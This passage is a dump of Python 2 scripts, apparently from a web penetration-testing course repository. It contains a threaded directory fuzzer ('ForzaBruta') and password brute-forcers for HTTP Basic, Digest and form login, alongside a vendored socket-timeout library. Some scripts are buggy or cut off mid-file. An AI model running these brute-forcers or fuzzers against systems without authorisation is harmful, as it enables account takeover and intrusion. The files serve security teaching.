65 | print totaltime + " \t" + colored(code,'green') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t"+ self.word
66 | elif '400' <= code < '500':
67 | print totaltime + " \t" + colored(code,'red') + "\t" + chars + " \t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
68 | elif '300' <= code < '400':
69 | print totaltime + " \t" + colored(code,'blue') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
70 | else:
71 | pass
72 | i[0] = i[0] - 1 # Here we remove one thread from the counter
73 | except Exception, e:
74 | print e
75 |
76 |
77 | def start(argv):
78 | banner()
79 | if len(sys.argv) < 5:
80 | usage()
81 | sys.exit()
82 | try:
83 | opts, args = getopt.getopt(argv, "w:f:t:c:")
84 | except getopt.GetoptError:
85 | print "Error en arguments"
86 | sys.exit()
87 | hidecode = 000
88 | for opt, arg in opts:
89 | if opt == '-w':
90 | url = arg
91 | elif opt == '-f':
92 | dict = arg
93 | elif opt == '-t':
94 | threads = arg
95 | elif opt == '-c':
96 | hidecode = arg
97 | try:
98 | f = open(dict, "r")
99 | words = f.readlines()
100 | except:
101 | print"Failed opening file: " + dict + "\n"
102 | sys.exit()
103 | launcher_thread(words, threads, url, hidecode)
104 |
105 |
106 | def launcher_thread(names, th, url, hidecode):
107 | global i
108 | i = []
109 | resultlist = []
110 | i.append(0)
111 | print "-------------------------------------------------------------------------------------------------------------"
112 | print "Time" + "\t\t\t" + "Code" + "\tChars \t Words \tLines \t MD5 \t\t\t\t\t String"
113 | print "-------------------------------------------------------------------------------------------------------------"
114 | while len(names):
115 | try:
116 | if i[0] < th:
117 | n = names.pop(0)
118 | i[0] = i[0] + 1
119 | thread = request_performer(n, url,hidecode)
120 | thread.start()
121 |
122 | except KeyboardInterrupt:
123 | print "ForzaBruta interrupted by user. Finishing attack.."
124 | sys.exit()
125 | thread.join()
126 | return
127 |
128 |
129 | if __name__ == "__main__":
130 | try:
131 | start(sys.argv[1:])
132 | except KeyboardInterrupt:
133 | print "ForzaBruta interrupted by user, killing all threads..!!"
134 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-back.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | from termcolor import colored
8 |
9 | from selenium import webdriver
10 | from selenium.webdriver.common.keys import Keys
11 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
12 |
13 |
14 | def banner():
15 | print "\n***************************************"
16 | print "* ForzaBruta 0.4*"
17 | print "***************************************"
18 |
19 |
20 | def usage():
21 | print "Usage:"
22 | print " -w: url (http://somesite.com/FUZZ)"
23 | print " -t: threads"
24 | print " -f: dictionary file\n"
25 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
26 |
27 |
28 | class request_performer(Thread):
29 | def __init__(self, word, url,hidecode):
30 | Thread.__init__(self)
31 | try:
32 | self.word = word.split("\n")[0]
33 | self.urly = url.replace('FUZZ', self.word)
34 | self.url = self.urly
35 | self.hidecode = hidecode
36 | except Exception, e:
37 | print e
38 |
39 | def run(self):
40 | try:
41 | start = time.time()
42 | r = requests.get(self.url)
43 | elaptime = time.time()
44 | totaltime = str(elaptime - start)
45 | lines = str(r.content.count("\n"))
46 | chars = str(len(r._content))
47 | words = str(len(re.findall("\S+", r.content)))
48 | code = str(r.status_code)
49 | if r.history != []:
50 | first = r.history[0]
51 | code = str(first.status_code)
52 | else:
53 | pass
54 | if self.hidecode != code:
55 | if '200' <= code < '300':
56 | print totaltime + " \t" + colored(code,'green') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t"+ self.word
57 | dcap = dict(DesiredCapabilities.PHANTOMJS)
58 | driver = webdriver.PhantomJS(desired_capabilities=dcap)
59 | time.sleep(2)
60 | driver.set_window_size(1024, 768)
61 | driver.get(self.url)
62 | driver.save_screenshot(self.url+".png")
63 |
64 | elif '400' <= code < '500':
65 | print totaltime + " \t" + colored(code,'red') + "\t" + chars + " \t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
66 | elif '300' <= code < '400':
67 | print totaltime + " \t" + colored(code,'blue') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
68 | else:
69 | pass
70 | i[0] = i[0] - 1 # Here we remove one thread from the counter
71 | except Exception, e:
72 | print e
73 |
74 |
75 | def start(argv):
76 | banner()
77 | if len(sys.argv) < 5:
78 | usage()
79 | sys.exit()
80 | try:
81 | opts, args = getopt.getopt(argv, "w:f:t:c:")
82 | except getopt.GetoptError:
83 | print "Error en arguments"
84 | sys.exit()
85 | hidecode = 000
86 | for opt, arg in opts:
87 | if opt == '-w':
88 | url = arg
89 | elif opt == '-f':
90 | dict = arg
91 | elif opt == '-t':
92 | threads = arg
93 | elif opt == '-c':
94 | hidecode = arg
95 | try:
96 | f = open(dict, "r")
97 | words = f.readlines()
98 | except:
99 | print"Failed opening file: " + dict + "\n"
100 | sys.exit()
101 | launcher_thread(words, threads, url, hidecode)
102 |
103 |
104 | def launcher_thread(names, th, url, hidecode):
105 | global i
106 | i = []
107 | resultlist = []
108 | i.append(0)
109 | print "-------------------------------------------------------------------------------------------------------------"
110 | print "Time" + "\t\t\t" + "Code" + "\tChars \t Words \tLines \t MD5 \t\t\t\t\t String"
111 | print "-------------------------------------------------------------------------------------------------------------"
112 | while len(names):
113 | try:
114 | if i[0] < th:
115 | n = names.pop(0)
116 | i[0] = i[0] + 1
117 | thread = request_performer(n, url, hidecode)
118 | thread.start()
119 |
120 | except KeyboardInterrupt:
121 | print "ForzaBruta interrupted by user. Finishing attack.."
122 | sys.exit()
123 | thread.join()
124 | return
125 |
126 |
127 | if __name__ == "__main__":
128 | try:
129 | start(sys.argv[1:])
130 | except KeyboardInterrupt:
131 | print "ForzaBruta interrupted by user, killing all threads..!!"
132 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import getopt
5 |
6 | def banner():
7 | print "\n***************************************"
8 | print "* ForzaBruta 0.1*"
9 | print "***************************************"
10 |
11 | def usage():
12 | print "Usage:"
13 | print " -w: url (http://somesite.com/FUZZ)"
14 | print " -t: threads"
15 | print " -f: dictionary file\n"
16 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
17 |
18 |
19 | class request_performer(Thread):
20 | def __init__( self,word,url):
21 | Thread.__init__(self)
22 | try:
23 | self.word = word.split("\n")[0]
24 | self.urly = url.replace('FUZZ',self.word)
25 | self.url = self.urly
26 | except Exception, e:
27 | print e
28 |
29 | def run(self):
30 | try:
31 | r = requests.get(self.url)
32 | print self.url + " - " + str(r.status_code)
33 | i[0]=i[0]-1 #Here we remove one thread from the counter
34 | except Exception, e:
35 | print e
36 |
37 | def start(argv):
38 | banner()
39 | if len(sys.argv) < 5:
40 | usage()
41 | sys.exit()
42 | try :
43 | opts, args = getopt.getopt(argv,"w:f:t:")
44 | except getopt.GetoptError:
45 | print "Error en arguments"
46 | sys.exit()
47 |
48 | for opt,arg in opts :
49 | if opt == '-w' :
50 | url=arg
51 | elif opt == '-f':
52 | dict= arg
53 | elif opt == '-t':
54 | threads=arg
55 | try:
56 | f = open(dict, "r")
57 | words = f.readlines()
58 | except:
59 | print"Failed opening file: "+ dict+"\n"
60 | sys.exit()
61 | launcher_thread(words,threads,url)
62 |
63 | def launcher_thread(names,th,url):
64 | global i
65 | i=[]
66 | resultlist=[]
67 | i.append(0)
68 | while len(names):
69 | try:
70 | if i[0]
4 | #
5 | # All Rights Reserved
6 | #
7 | # Permission to use, copy, modify, and distribute this software
8 | # and its documentation for any purpose and without fee is hereby
9 | # granted, provided that the above copyright notice appear in all
10 | # copies and that both that copyright notice and this permission
11 | # notice appear in supporting documentation, and that the name of
12 | # Timothy O'Malley not be used in advertising or publicity
13 | # pertaining to distribution of the software without specific, written
14 | # prior permission.
15 | #
16 | # Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
17 | # SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
18 | # AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR
19 | # ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
20 | # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
21 | # WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
22 | # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
23 | # PERFORMANCE OF THIS SOFTWARE.
24 | #
25 | ####
26 |
27 | """Timeout Socket
28 |
29 | This module enables a timeout mechanism on all TCP connections. It
30 | does this by inserting a shim into the socket module. After this module
31 | has been imported, all socket creation goes through this shim. As a
32 | result, every TCP connection will support a timeout.
33 |
34 | The beauty of this method is that it immediately and transparently
35 | enables the entire python library to support timeouts on TCP sockets.
36 | As an example, if you wanted to SMTP connections to have a 20 second
37 | timeout:
38 |
39 | import timeoutsocket
40 | import smtplib
41 | timeoutsocket.setDefaultSocketTimeout(20)
42 |
43 |
44 | The timeout applies to the socket functions that normally block on
45 | execution: read, write, connect, and accept. If any of these
46 | operations exceeds the specified timeout, the exception Timeout
47 | will be raised.
48 |
49 | The default timeout value is set to None. As a result, importing
50 | this module does not change the default behavior of a socket. The
51 | timeout mechanism only activates when the timeout has been set to
52 | a numeric value. (This behavior mimics the behavior of the
53 | select.select() function.)
54 |
55 | This module implements two classes: TimeoutSocket and TimeoutFile.
56 |
57 | The TimeoutSocket class defines a socket-like object that attempts to
58 | avoid the condition where a socket may block indefinitely. The
59 | TimeoutSocket class raises a Timeout exception whenever the
60 | current operation delays too long.
61 |
62 | The TimeoutFile class defines a file-like object that uses the TimeoutSocket
63 | class. When the makefile() method of TimeoutSocket is called, it returns
64 | an instance of a TimeoutFile.
65 |
66 | Each of these objects adds two methods to manage the timeout value:
67 |
68 | get_timeout() --> returns the timeout of the socket or file
69 | set_timeout() --> sets the timeout of the socket or file
70 |
71 |
72 | As an example, one might use the timeout feature to create httplib
73 | connections that will timeout after 30 seconds:
74 |
75 | import timeoutsocket
76 | import httplib
77 | H = httplib.HTTP("www.python.org")
78 | H.sock.set_timeout(30)
79 |
80 | Note: When used in this manner, the connect() routine may still
81 | block because it happens before the timeout is set. To avoid
82 | this, use the 'timeoutsocket.setDefaultSocketTimeout()' function.
83 |
84 | Good Luck!
85 |
86 | """
87 |
88 | __version__ = "$Revision: 1.23 $"
89 | __author__ = "Timothy O'Malley "
90 |
91 | #
92 | # Imports
93 | #
94 | import select, string
95 | import socket
96 | if not hasattr(socket, "_no_timeoutsocket"):
97 | _socket = socket.socket
98 | else:
99 | _socket = socket._no_timeoutsocket
100 |
101 |
102 | #
103 | # Set up constants to test for Connected and Blocking operations.
104 | # We delete 'os' and 'errno' to keep our namespace clean(er).
105 | # Thanks to Alex Martelli and G. Li for the Windows error codes.
106 | #
107 | import os
108 | if os.name == "nt":
109 | _IsConnected = ( 10022, 10056 )
110 | _ConnectBusy = ( 10035, )
111 | _AcceptBusy = ( 10035, )
112 | else:
113 | import errno
114 | _IsConnected = ( errno.EISCONN, )
115 | _ConnectBusy = ( errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK )
116 | _AcceptBusy = ( errno.EAGAIN, errno.EWOULDBLOCK )
117 | del errno
118 | del os
119 |
120 |
121 | #
122 | # Default timeout value for ALL TimeoutSockets
123 | #
124 | _DefaultTimeout = None
125 | def setDefaultSocketTimeout(timeout):
126 | global _DefaultTimeout
127 | _DefaultTimeout = timeout
128 | def getDefaultSocketTimeout():
129 | return _DefaultTimeout
130 |
131 | #
132 | # Exceptions for socket errors and timeouts
133 | #
134 | Error = socket.error
135 | class Timeout(Exception):
136 | pass
137 |
138 |
139 | #
140 | # Factory function
141 | #
142 | from socket import AF_INET, SOCK_STREAM
143 | def timeoutsocket(family=AF_INET, type=SOCK_STREAM, proto=None):
144 | if family != AF_INET or type != SOCK_STREAM:
145 | if proto:
146 | return _socket(family, type, proto)
147 | else:
148 | return _socket(family, type)
149 | return TimeoutSocket( _socket(family, type), _DefaultTimeout )
150 | # end timeoutsocket
151 |
152 | #
153 | # The TimeoutSocket class definition
154 | #
155 | class TimeoutSocket:
156 | """TimeoutSocket object
157 | Implements a socket-like object that raises Timeout whenever
158 | an operation takes too long.
159 | The definition of 'too long' can be changed using the
160 | set_timeout() method.
161 | """
162 |
163 | _copies = 0
164 | _blocking = 1
165 |
166 | def __init__(self, sock, timeout):
167 | self._sock = sock
168 | self._timeout = timeout
169 | # end __init__
170 |
171 | def __getattr__(self, key):
172 | return getattr(self._sock, key)
173 | # end __getattr__
174 |
175 | def get_timeout(self):
176 | return self._timeout
177 | # end set_timeout
178 |
179 | def set_timeout(self, timeout=None):
180 | self._timeout = timeout
181 | # end set_timeout
182 |
183 | def setblocking(self, blocking):
184 | self._blocking = blocking
185 | return self._sock.setblocking(blocking)
186 | # end set_timeout
187 |
188 | def connect_ex(self, addr):
189 | errcode = 0
190 | try:
191 | self.connect(addr)
192 | except Error, why:
193 | errcode = why[0]
194 | return errcode
195 | # end connect_ex
196 |
197 | def connect(self, addr, port=None, dumbhack=None):
198 | # In case we were called as connect(host, port)
199 | if port != None: addr = (addr, port)
200 |
201 | # Shortcuts
202 | sock = self._sock
203 | timeout = self._timeout
204 | blocking = self._blocking
205 |
206 | # First, make a non-blocking call to connect
207 | try:
208 | sock.setblocking(0)
209 | sock.connect(addr)
210 | sock.setblocking(blocking)
211 | return
212 | except Error, why:
213 | # Set the socket's blocking mode back
214 | sock.setblocking(blocking)
215 |
216 | # If we are not blocking, re-raise
217 | if not blocking:
218 | raise
219 |
220 | # If we are already connected, then return success.
221 | # If we got a genuine error, re-raise it.
222 | errcode = why[0]
223 | if dumbhack and errcode in _IsConnected:
224 | return
225 | elif errcode not in _ConnectBusy:
226 | raise
227 |
228 | # Now, wait for the connect to happen
229 | # ONLY if dumbhack indicates this is pass number one.
230 | # If select raises an error, we pass it on.
231 | # Is this the right behavior?
232 | if not dumbhack:
233 | r,w,e = select.select([], [sock], [], timeout)
234 | if w:
235 | return self.connect(addr, dumbhack=1)
236 |
237 | # If we get here, then we should raise Timeout
238 | raise Timeout("Attempted connect to %s timed out." % str(addr) )
239 | # end connect
240 |
241 | def accept(self, dumbhack=None):
242 | # Shortcuts
243 | sock = self._sock
244 | timeout = self._timeout
245 | blocking = self._blocking
246 |
247 | # First, make a non-blocking call to accept
248 | # If we get a valid result, then convert the
249 | # accept'ed socket into a TimeoutSocket.
250 | # Be carefult about the blocking mode of ourselves.
251 | try:
252 | sock.setblocking(0)
253 | newsock, addr = sock.accept()
254 | sock.setblocking(blocking)
255 | timeoutnewsock = self.__class__(newsock, timeout)
256 | timeoutnewsock.setblocking(blocking)
257 | return (timeoutnewsock, addr)
258 | except Error, why:
259 | # Set the socket's blocking mode back
260 | sock.setblocking(blocking)
261 |
262 | # If we are not supposed to block, then re-raise
263 | if not blocking:
264 | raise
265 |
266 | # If we got a genuine error, re-raise it.
267 | errcode = why[0]
268 | if errcode not in _AcceptBusy:
269 | raise
270 |
271 | # Now, wait for the accept to happen
272 | # ONLY if dumbhack indicates this is pass number one.
273 | # If select raises an error, we pass it on.
274 | # Is this the right behavior?
275 | if not dumbhack:
276 | r,w,e = select.select([sock], [], [], timeout)
277 | if r:
278 | return self.accept(dumbhack=1)
279 |
280 | # If we get here, then we should raise Timeout
281 | raise Timeout("Attempted accept timed out.")
282 | # end accept
283 |
284 | def send(self, data, flags=0):
285 | sock = self._sock
286 | if self._blocking:
287 | r,w,e = select.select([],[sock],[], self._timeout)
288 | if not w:
289 | raise Timeout("Send timed out")
290 | return sock.send(data, flags)
291 | # end send
292 |
293 | def recv(self, bufsize, flags=0):
294 | sock = self._sock
295 | if self._blocking:
296 | r,w,e = select.select([sock], [], [], self._timeout)
297 | if not r:
298 | raise Timeout("Recv timed out")
299 | return sock.recv(bufsize, flags)
300 | # end recv
301 |
302 | def makefile(self, flags="r", bufsize=-1):
303 | self._copies = self._copies +1
304 | return TimeoutFile(self, flags, bufsize)
305 | # end makefile
306 |
307 | def close(self):
308 | if self._copies <= 0:
309 | self._sock.close()
310 | else:
311 | self._copies = self._copies -1
312 | # end close
313 |
314 | # end TimeoutSocket
315 |
316 |
317 | class TimeoutFile:
318 | """TimeoutFile object
319 | Implements a file-like object on top of TimeoutSocket.
320 | """
321 |
322 | def __init__(self, sock, mode="r", bufsize=4096):
323 | self._sock = sock
324 | self._bufsize = 4096
325 | if bufsize > 0: self._bufsize = bufsize
326 | if not hasattr(sock, "_inqueue"): self._sock._inqueue = ""
327 |
328 | # end __init__
329 |
330 | def __getattr__(self, key):
331 | return getattr(self._sock, key)
332 | # end __getattr__
333 |
334 | def close(self):
335 | self._sock.close()
336 | self._sock = None
337 | # end close
338 |
339 | def write(self, data):
340 | self.send(data)
341 | # end write
342 |
343 | def read(self, size=-1):
344 | _sock = self._sock
345 | _bufsize = self._bufsize
346 | while 1:
347 | datalen = len(_sock._inqueue)
348 | if datalen >= size >= 0:
349 | break
350 | bufsize = _bufsize
351 | if size > 0:
352 | bufsize = min(bufsize, size - datalen )
353 | buf = self.recv(bufsize)
354 | if not buf:
355 | break
356 | _sock._inqueue = _sock._inqueue + buf
357 | data = _sock._inqueue
358 | _sock._inqueue = ""
359 | if size > 0 and datalen > size:
360 | _sock._inqueue = data[size:]
361 | data = data[:size]
362 | return data
363 | # end read
364 |
365 | def readline(self, size=-1):
366 | _sock = self._sock
367 | _bufsize = self._bufsize
368 | while 1:
369 | idx = string.find(_sock._inqueue, "\n")
370 | if idx >= 0:
371 | break
372 | datalen = len(_sock._inqueue)
373 | if datalen >= size >= 0:
374 | break
375 | bufsize = _bufsize
376 | if size > 0:
377 | bufsize = min(bufsize, size - datalen )
378 | buf = self.recv(bufsize)
379 | if not buf:
380 | break
381 | _sock._inqueue = _sock._inqueue + buf
382 |
383 | data = _sock._inqueue
384 | _sock._inqueue = ""
385 | if idx >= 0:
386 | idx = idx + 1
387 | _sock._inqueue = data[idx:]
388 | data = data[:idx]
389 | elif size > 0 and datalen > size:
390 | _sock._inqueue = data[size:]
391 | data = data[:size]
392 | return data
393 | # end readline
394 |
395 | def readlines(self, sizehint=-1):
396 | result = []
397 | data = self.read()
398 | while data:
399 | idx = string.find(data, "\n")
400 | if idx >= 0:
401 | idx = idx + 1
402 | result.append( data[:idx] )
403 | data = data[idx:]
404 | else:
405 | result.append( data )
406 | data = ""
407 | return result
408 | # end readlines
409 |
410 | def flush(self): pass
411 |
412 | # end TimeoutFile
413 |
414 |
415 | #
416 | # Silently replace the socket() builtin function with
417 | # our timeoutsocket() definition.
418 | #
419 | if not hasattr(socket, "_no_timeoutsocket"):
420 | socket._no_timeoutsocket = socket.socket
421 | socket.socket = timeoutsocket
422 | del socket
423 | socket = timeoutsocket
424 | # Finis
425 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/Section 5 - Video 2.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter05/Section-5/Section 5 - Video 2.pptx
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/back2basics.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | from termcolor import colored
7 |
8 | global hit # Flag to know when we have a valid password
9 | hit = "1"
10 |
11 |
12 | def banner():
13 | print "\n***************************************"
14 | print "* Basic Authentication bruteforcer 1.0*"
15 | print "***************************************"
16 |
17 |
18 | def usage():
19 | print "Usage:"
20 | print " -w: url (http://somesite.com/admin)"
21 | print " -u: username"
22 | print " -t: threads"
23 | print " -f: dictionary file\n"
24 | print "example: back2basic.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
25 |
26 |
27 | class request_performer(Thread):
28 | def __init__(self, name, user, url):
29 | Thread.__init__(self)
30 | self.password = name.split("\n")[0]
31 | self.username = user
32 | self.url = url
33 | print "-" + self.password + "-"
34 |
35 | def run(self):
36 | global hit
37 | if hit == "1":
38 | try:
39 | r = requests.get(self.url, auth=(self.username, self.password))
40 | if r.status_code == 200:
41 | hit = "0"
42 | print "[+] Password found - " + colored(self.password, 'green') + " - !!!\r"
43 | sys.exit()
44 | else:
45 | print "Not valid " + self.password
46 | i[0] = i[0] - 1 # Here we remove one thread from the counter
47 | except Exception, e:
48 | print e
49 |
50 |
51 | def start(argv):
52 | banner()
53 | if len(sys.argv) < 5:
54 | usage()
55 | sys.exit()
56 | try:
57 | opts, args = getopt.getopt(argv, "u:w:f:t:")
58 | except getopt.GetoptError:
59 | print "Error en arguments"
60 | sys.exit()
61 |
62 | for opt, arg in opts:
63 | if opt == '-u':
64 | user = arg
65 | elif opt == '-w':
66 | url = arg
67 | elif opt == '-f':
68 | dictio = arg
69 | elif opt == '-t':
70 | threads = arg
71 | try:
72 | f = open(dictio, "r")
73 | name = f.readlines()
74 | except:
75 | print"Failed opening file: " + dictio + "\n"
76 | sys.exit()
77 | launcher_thread(name, threads, user, url)
78 |
79 |
80 | def launcher_thread(names, th, username, url):
81 | global i
82 | i = []
83 | i.append(0)
84 | while len(names):
85 | if hit == "1":
86 | try:
87 | if i[0] < th:
88 | n = names.pop(0)
89 | i[0] = i[0] + 1
90 | thread = request_performer(n, username, url)
91 | thread.start()
92 |
93 | except KeyboardInterrupt:
94 | print "Brute forcer interrupted by user. Finishing attack.."
95 | sys.exit()
96 | thread.join()
97 | else:
98 | sys.exit()
99 | return
100 |
101 |
102 | if __name__ == "__main__":
103 | try:
104 | start(sys.argv[1:])
105 | except KeyboardInterrupt:
106 | print "Brute force interrupted by user, killing all threads..!!"
107 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/back2digest.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | from termcolor import colored
7 | from requests.auth import HTTPDigestAuth
8 |
9 | global hit # Flag to know when we have a valid password
10 | hit = "1"
11 |
12 |
13 | def banner():
14 | print "\n***************************************"
15 | print "* Basic password bruteforcer 1.0*"
16 | print "***************************************"
17 |
18 |
19 | def usage():
20 | print "Usage:"
21 | print "\t-w: url (http://somesite.com/admin)"
22 | print "\t-u: username"
23 | print "\t-t: threads"
24 | print "\t-f: dictionary file"
25 | print "\t-m: method (basic or digest)\n"
26 | print "example: back2basic.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
27 |
28 |
29 | class request_performer(Thread):
30 | def __init__(self, name, user, url, method):
31 | Thread.__init__(self)
32 | self.password = name.split("\n")[0]
33 | self.username = user
34 | self.url = url
35 | self.method = method
36 |
37 |
38 | def run(self):
39 | global hit
40 | if hit == "1":
41 | try:
42 | if self.method == "basic":
43 | r = requests.get(self.url, auth=(self.username, self.password))
44 | elif self.method == "digest":
45 | r = requests.get(self.url, auth=HTTPDigestAuth(self.username, self.password))
46 |
47 | if r.status_code == 200:
48 | hit = "0"
49 | print "[+] Password found - " + colored(self.password, 'green') + " - !!!\r"
50 | sys.exit()
51 | else:
52 | print "Not valid " + self.password
53 | i[0] = i[0] - 1 # Here we remove one thread from the counter
54 | except Exception, e:
55 | print e
56 |
57 |
58 | def start(argv):
59 | banner()
60 | if len(sys.argv) < 5:
61 | usage()
62 | sys.exit()
63 | try:
64 | opts, args = getopt.getopt(argv, "u:w:f:m:t:")
65 | except getopt.GetoptError:
66 | print "Error en arguments"
67 | sys.exit()
68 | method = "basic"
69 | for opt, arg in opts:
70 | if opt == '-u':
71 | user = arg
72 | elif opt == '-w':
73 | url = arg
74 | elif opt == '-f':
75 | dictio = arg
76 | elif opt == '-m':
77 | method = arg
78 | elif opt == '-t':
79 | threads = arg
80 | try:
81 | f = open(dictio, "r")
82 | name = f.readlines()
83 | except:
84 | print"Failed opening file: " + dictio + "\n"
85 | sys.exit()
86 | launcher_thread(name, threads, user, url, method)
87 |
88 |
89 | def launcher_thread(names, th, username, url, method):
90 | global i
91 | i = []
92 | i.append(0)
93 | while len(names):
94 | if hit == "1":
95 | try:
96 | if i[0] < th:
97 | n = names.pop(0)
98 | i[0] = i[0] + 1
99 | thread = request_performer(n, username, url, method)
100 | thread.start()
101 |
102 | except KeyboardInterrupt:
103 | print "Brute forcer interrupted by user. Finishing attack.."
104 | sys.exit()
105 | thread.join()
106 | else:
107 | sys.exit()
108 | return
109 |
110 |
111 | if __name__ == "__main__":
112 | try:
113 | start(sys.argv[1:])
114 | except KeyboardInterrupt:
115 | print "Brute force interrupted by user, killing all threads..!!"
116 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/back2forms.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | from termcolor import colored
7 | from requests.auth import HTTPDigestAuth
8 |
9 | global hit # Flag to know when we have a valid password
10 | hit = "1"
11 |
12 |
13 | def banner():
14 | print "\n***************************************"
15 | print "* Password brute forcer 1.0*"
16 | print "***************************************"
17 |
18 |
19 | def usage():
20 | print "Usage:"
21 | print "\t-w: url (http://somesite.com/admin)"
22 | print "\t-u: username"
23 | print "\t-t: threads"
24 | print "\t-f: dictionary file"
25 | print "\t-m: method (basic, digest, forms)"
26 | print "\t-p: POST payload\n"
27 | print "example: back2basic.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
28 |
29 |
30 | class request_performer(Thread):
31 | def __init__(self, name, user, url, method, payload):
32 | Thread.__init__(self)
33 | self.password = name.split("\n")[0]
34 | self.username = user
35 | self.url = url
36 | self.method = method
37 | self.payload = payload
38 | print "-" + self.password + "-"
39 |
40 | def run(self):
41 | global hit
42 | if hit == "1":
43 | try:
44 | if self.method == "basic":
45 | r = requests.get(self.url, auth=(self.username, self.password))
46 | elif self.method == "digest":
47 | r = requests.get(self.url, auth=HTTPDigestAuth(self.username, self.password))
48 | elif self.method == "form":
49 | post_payload = r.requests.post()
50 |
51 | if r.status_code == 200:
52 | hit = "0"
53 | print "[+] Password found - " + colored(self.password, 'green') + " - !!!\r"
54 | sys.exit()
55 | else:
56 | print "Not valid " + self.password
57 | i[0] = i[0] - 1 # Here we remove one thread from the counter
58 | except Exception, e:
59 | print e
60 |
61 |
62 | def start(argv):
63 | banner()
64 | if len(sys.argv) < 5:
65 | usage()
66 | sys.exit()
67 | try:
68 | opts, args = getopt.getopt(argv, "u:w:f:m:p:t:")
69 | except getopt.GetoptError:
70 | print "Error en arguments"
71 | sys.exit()
72 | method = "basic"
73 | payload = ""
74 | for opt, arg in opts:
75 | if opt == '-u':
76 | user = arg
77 | elif opt == '-w':
78 | url = arg
79 | elif opt == '-f':
80 | dictio = arg
81 | elif opt == '-m':
82 | method = arg
83 | elif opt == '-p':
84 | payload = arg
85 | elif opt == '-t':
86 | threads = arg
87 | try:
88 | f = open(dictio, "r")
89 | name = f.readlines()
90 | except:
91 | print"Failed opening file: " + dictio + "\n"
92 | sys.exit()
93 | launcher_thread(name, threads, user, url, method, payload)
94 |
95 |
96 | def launcher_thread(names, th, username, url, method, payload):
97 | global i
98 | i = []
99 | i.append(0)
100 | while len(names):
101 | if hit == "1":
102 | try:
103 | if i[0] < th:
104 | n = names.pop(0)
105 | i[0] = i[0] + 1
106 | thread = request_performer(n, username, url, method, payload)
107 | thread.start()
108 |
109 | except KeyboardInterrupt:
110 | print "Brute forcer interrupted by user. Finishing attack.."
111 | sys.exit()
112 | thread.join()
113 | else:
114 | sys.exit()
115 | return
116 |
117 |
118 | if __name__ == "__main__":
119 | try:
120 | start(sys.argv[1:])
121 | except KeyboardInterrupt:
122 | print "Brute force interrupted by user, killing all threads..!!"
123 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/brute-digest.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from requests.auth import HTTPDigestAuth
3 | from threading import Thread
4 | import sys
5 | import time
6 | import getopt
7 |
8 | global hit # Flag to know when we have a valid password
9 | hit = "1"
10 |
11 |
12 | def banner():
13 | print "\n***************************************"
14 | print "* Digest Authentication bruteforcer 1.0*"
15 | print "***************************************"
16 |
17 |
18 | def usage():
19 | print "Usage:"
20 | print " -w: url (http://somesite.com/admin)"
21 | print " -u: username"
22 | print " -t: threads"
23 | print " -f: dictionary file\n"
24 | print "example: brute-digest.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
25 |
26 |
27 | class request_performer(Thread):
28 | def __init__(self, name, user, url):
29 | Thread.__init__(self)
30 | self.password = name.split("\n")[0]
31 | self.username = user
32 | self.url = url
33 |
34 | def run(self):
35 | global hit
36 | if hit == "1":
37 | try:
38 | r = requests.get(self.url, auth=HTTPDigestAuth(self.username, self.password))
39 | if r.status_code == 200:
40 | hit = "0"
41 | print "Password found - " + self.password + " - !!!"
42 | print "CONTENT************************************************"
43 | print r.text
44 | print "*******************************************************"
45 | sys.exit()
46 | else:
47 | print "Not valid " + self.password
48 | i[0] = i[0] - 1 # Here we remove one thread from the counter
49 | except Exception, e:
50 | print e
51 |
52 |
53 | def start(argv):
54 | banner()
55 | if len(sys.argv) < 5:
56 | usage()
57 | sys.exit()
58 | try:
59 | opts, args = getopt.getopt(argv, "u:w:f:t:")
60 | except getopt.GetoptError:
61 | print "Error en arguments"
62 | sys.exit()
63 |
64 | for opt, arg in opts:
65 | if opt == '-u':
66 | user = arg
67 | elif opt == '-w':
68 | url = arg
69 | elif opt == '-f':
70 | dict = arg
71 | elif opt == '-t':
72 | threads = arg
73 | try:
